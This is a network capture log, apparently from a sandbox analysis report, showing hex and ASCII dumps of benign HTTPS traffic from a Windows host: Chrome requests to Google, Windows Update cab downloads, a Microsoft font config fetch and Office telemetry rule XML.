2024-11-22 19:35:13 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 5c 22 29 2c 49 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 49 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 49 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 48 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4e 64 28 5f 2e 4a 64 3f 5f 2e 4a 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d Data Ascii: 8000\"),Id(\"https\"),Id(\"mailto\"),Id(\"ftp\"),new _.Hd(a\u003d\u003e/^[^:]*([/?#]\|$)/.test(a))];_.Nd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Od\u003dnew _.Nd(_.Jd?_.Jd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}
2024-11-22 19:35:13 UTC	1390	IN	Data Raw: 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 50 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 75 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 Data Ascii: nce\")\|\|\"\"};\n_.be\u003dfunction(a){var b\u003d_.Pa(a);return b\u003d\u003d\"array\"\|\|b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ce\u003dfunction(a,b,c){return _.ub(a,b,c,!1)!\u003d\u003dvoid 0};_.de\u003dfunction(a,b){r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	142.250.181.100	443	7992	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:12 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-22 19:35:13 UTC	933	IN	HTTP/1.1 200 OK Version: 698289427 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 22 Nov 2024 19:35:12 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-22 19:35:13 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-22 19:35:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	2.18.84.141	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:16 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-22 19:35:17 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF17) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=76229 Date: Fri, 22 Nov 2024 19:35:16 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	4.175.87.197	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:18 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zeVK4sAsYaA8nSs&MD=rnFVSrPb HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-22 19:35:18 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: aed956d6-fed5-46bf-b1a3-5fbe551b597d MS-RequestId: 630d999f-0dc6-49b6-a410-a255743a8d3b MS-CV: Sh+8GwtAXUeEfJKK.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 22 Nov 2024 19:35:18 GMT Connection: close Content-Length: 24490
2024-11-22 19:35:18 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-22 19:35:18 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49752	2.18.84.141	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:18 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-22 19:35:18 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=76227 Date: Fri, 22 Nov 2024 19:35:18 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-22 19:35:18 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.4	49761	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:56 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:35:56 UTC	471	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:56 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Thu, 21 Nov 2024 12:25:08 GMT ETag: "0x8DD0A27899CAFB6" x-ms-request-id: 0e3600b6-201e-0096-7125-3cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193556Z-178bfbc474bfw4gbhC1NYCunf400000003a000000000tg7q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:35:56 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-22 19:35:57 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-22 19:35:57 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-22 19:35:57 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-22 19:35:57 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-22 19:35:57 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-22 19:35:57 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-22 19:35:57 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-22 19:35:57 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-22 19:35:57 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49762	4.175.87.197	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:58 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zeVK4sAsYaA8nSs&MD=rnFVSrPb HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-22 19:35:59 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 77cc1ba6-ca71-4d49-ae0f-ee0cf8782bea MS-RequestId: 078b0e69-80fd-4d73-876a-ad42cd803c0a MS-CV: gW29inGU7k2CBAvE.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 22 Nov 2024 19:35:58 GMT Connection: close Content-Length: 30005
2024-11-22 19:35:59 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 